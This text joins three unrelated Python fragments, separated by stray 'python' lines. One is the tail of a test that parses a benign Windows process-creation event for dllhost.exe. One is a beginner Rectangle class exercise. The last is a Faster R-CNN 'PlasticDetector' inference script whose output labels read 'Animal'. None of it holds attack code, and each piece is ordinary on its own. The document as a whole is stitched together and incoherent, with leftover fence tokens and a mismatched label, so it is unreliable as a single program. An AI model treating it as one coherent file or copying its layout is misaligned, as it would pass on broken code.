        "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
        "eventid_qualifiers": "4688",
        "version": "1",
        "level": "0",
        "task": "13312",
        "opcode": "0",
        "keywords": "0x8020000000000000",
        "timecreated_systemtime": 1_474_410_459,
        "eventrecordid": "13344",
        "correlation_activityid": "",
        "correlation_relatedactivityid": "",
        "execution_processid": "4",
        "execution_threadid": "60",
        "channel": "Security",
        "computer": "IE10Win7",
        "security_userid": "",
        "system": None,
        "data_name_subjectusersid": "S-1-5-18",
        "data_name_subjectusername": "IE10WIN7$",
        "data_name_subjectdomainname": "WORKGROUP",
        "data_name_subjectlogonid": "0x00000000000003e7",
        "data_name_newprocessid": "0x00000dec",
        "data_name_newprocessname": "C:\\Windows\\System32\\dllhost.exe",
        "data_name_tokenelevationtype": "%%1938",
        "data_name_processid": "0x00000248",
        "data_name_commandline": "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}",
        "eventdata": None,
        "event": None,
    }

    nodes = transformer.transform(input_event)
    proc: Process = nodes[0]
    proc_file: File = nodes[1]
    parent: Process = nodes[2]

    assert proc.process_id == 3564
    assert proc.process_image == "dllhost.exe"
    assert proc.process_image_path == "C:\\Windows\\System32"
    assert (
        proc.command_line
        == "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}"
    )
    assert proc.host == "IE10Win7"
    assert parent.process_id == 584
    assert proc_file.file_name == "dllhost.exe"
    assert {"timestamp": 1_474_410_459} in parent.launched[proc]
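# The expected process IDs in the asserts above come from the hexadecimal fields
# in the event record: int("0x00000dec", 16) == 3564 for the new process and
# int("0x00000248", 16) == 584 for its parent.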
python
# Exercise 2: To practice our ability to abstract, let's model some parts of a
# geometry program. How could we model a rectangle object?


class Rectangle:
    def __init__(self, width, height):
        self._width = width
        self._height = height

    def area(self):
        # Area of a rectangle: width * height
        return self._width * self._height

    def perimeter(self):
        # Perimeter of a rectangle: 2 * (width + height)
        return 2 * (self._width + self._height)
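# Quick usage example for the class above:
if __name__ == "__main__":
    rect = Rectangle(3, 4)
    print(rect.area())       # 12
    print(rect.perimeter())  # 14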
python
import os

import matplotlib
from tqdm import tqdm
import numpy as np

from model import FasterRCNNVGG16
from trainer import FasterRCNNTrainer
from utils.config import opt
import data.dataset
import data.util

import torch
from torch.autograd import Variable
from torch.utils import data as data_
import torchvision.transforms as transforms

from utils import array_tool as at
from utils.vis_tool import visdom_bbox

import torch.utils.data

import PIL
import PIL.ImageDraw
import PIL.ImageFont

# rlimit = resource.getrlimit(resource.RLIMIT_NOFILE)
# resource.setrlimit(resource.RLIMIT_NOFILE, (20480, rlimit[1]))


class PlasticDetector:

    def __init__(self, model_path, useGPU, n_fg_classes=2):
        '''
        Creates a new detection model using the weights stored in the file
        MODEL_PATH and initializes the GPU if USEGPU is set to true.

        MODEL_PATH: path to a trained detection model.
        USEGPU: if true, the GPU will be used for faster computations.
        '''
        torch.set_num_threads(1)
        opt.load_path = model_path
        self.faster_rcnn = FasterRCNNVGG16(n_fg_class=n_fg_classes,
                                           anchor_scales=[1])
        self.trainer = FasterRCNNTrainer(self.faster_rcnn,
                                         n_fg_class=n_fg_classes)
        if useGPU:
            self.trainer = self.trainer.cuda()
        old_state = self.trainer.load(model_path)
        self.transforms = transforms.ToTensor()
        self.useGPU = useGPU

    def predict_image(self, img, topk):
        '''
        Detects objects in the provided testing images.

        IMG: PIL image fitting the input of the trained model
        TOPK: the number of bounding boxes to return. We return the most
            confident bounding boxes first.

        RETURNS: (BBOXES, CONFS) where BBOXES is a n x 4 array, where each line
            corresponds to one bounding box. The bounding box coordinates are
            stored in the format [x_min, y_min, x_max, y_max], where x
            corresponds to the width and y to the height. CONFS are the
            confidence values for each bounding box and are a n x m array.
            Each row corresponds to the bounding box in the same row of BBOXES
            and provides the scores for the m classes that the model was
            trained to detect.
        '''
        pred_bboxes, pred_labels, pred_scores = self._run_prediction(img)
        return pred_bboxes[:topk, [1, 0, 3, 2]], pred_scores[:topk]

    def annotate_image(self, img, topk):
        '''
        Detects objects in the provided testing images.

        IMG: PIL image fitting the input of the trained model
        TOPK: the number of bounding boxes to return. We return the most
            confident bounding boxes first.

        RETURNS:
        IMG: a PIL image with the detected bounding boxes annotated as
            rectangles.
        '''
        pred_bboxes, pred_labels, pred_scores = self._run_prediction(img)
        draw = PIL.ImageDraw.Draw(img)
        colors = [(255, 0, 0), (0, 255, 0)]
        for bbox, label, score in zip(pred_bboxes, pred_labels, pred_scores):
            draw.rectangle(bbox[[1, 0, 3, 2]], outline=colors[label])
            # font = PIL.ImageFont.truetype("sans-serif.ttf", 16)
            # draw.text(bbox[[1, 0]], "Sample Text", colors[label])
        return img

    def _run_prediction(self, img):
        '''
        Prepare an input image for CNN processing and run the detector.

        IMG: PIL image

        RETURN: IMG as pytorch tensor in the format 1xCxHxW normalized
            according to data.dataset.caffe_normalize.
        '''
        img = img.convert('RGB')
        img = np.asarray(img, dtype=np.float32)
        if img.ndim == 2:
            # reshape (H, W) -> (1, H, W)
            img = img[np.newaxis]
        else:
            # transpose (H, W, C) -> (C, H, W)
            img = img.transpose((2, 0, 1))
        proc_img = data.dataset.caffe_normalize(img / 255.)
        tensor_img = torch.from_numpy(proc_img).unsqueeze(0)
        if self.useGPU:
            tensor_img = tensor_img.cuda()
        # This preset filters bounding boxes with a score < 0.7
        # and has to be set every time before using predict()
        self.faster_rcnn.use_preset('visualize')
        pred_bboxes, pred_labels, pred_scores = self.faster_rcnn.predict(
            tensor_img, [(img.shape[1], img.shape[2])])
        box_filter = np.array(pred_scores[0]) > 0.7
        return (pred_bboxes[0][box_filter], pred_labels[0][box_filter],
                pred_scores[0][box_filter])


if __name__ == '__main__':
    det = PlasticDetector('checkpoints/fasterrcnn_07122125_0.5273599762268979',
                          True)
    print('Loaded model.')
    image_path = 'misc/demo.jpg'
    test_image = PIL.Image.open(image_path)
    print('Working on image {}'.format(image_path))
    print(det.predict_image(test_image, 5))

    pred_bboxes, pred_scores = det.predict_image(test_image, 1000)
    pred_img = visdom_bbox(
        np.array(test_image.convert('RGB')).transpose((2, 0, 1)),
        at.tonumpy(pred_bboxes[:, [1, 0, 3, 2]]),
        at.tonumpy([1 for _ in pred_bboxes]),
        at.tonumpy(pred_scores),
        label_names=['Animal', 'BG'])
    PIL.Image.fromarray(
        (255 * pred_img).transpose((1, 2, 0)).astype(np.uint8)
    ).save('output.jpg')
    det.annotate_image(test_image, 5).save('output-annotate.jpg')
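# Note on the [1, 0, 3, 2] indexing used throughout this class: the underlying
# Faster R-CNN code returns boxes as [y_min, x_min, y_max, x_max], while PIL and
# the public API here use [x_min, y_min, x_max, y_max]. A tiny illustration
# (kept as a comment so the script's behaviour is unchanged):
#
#   box_yx = np.array([10., 20., 30., 40.])   # [y_min, x_min, y_max, x_max]
#   box_xy = box_yx[[1, 0, 3, 2]]             # -> [20., 10., 40., 30.]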
python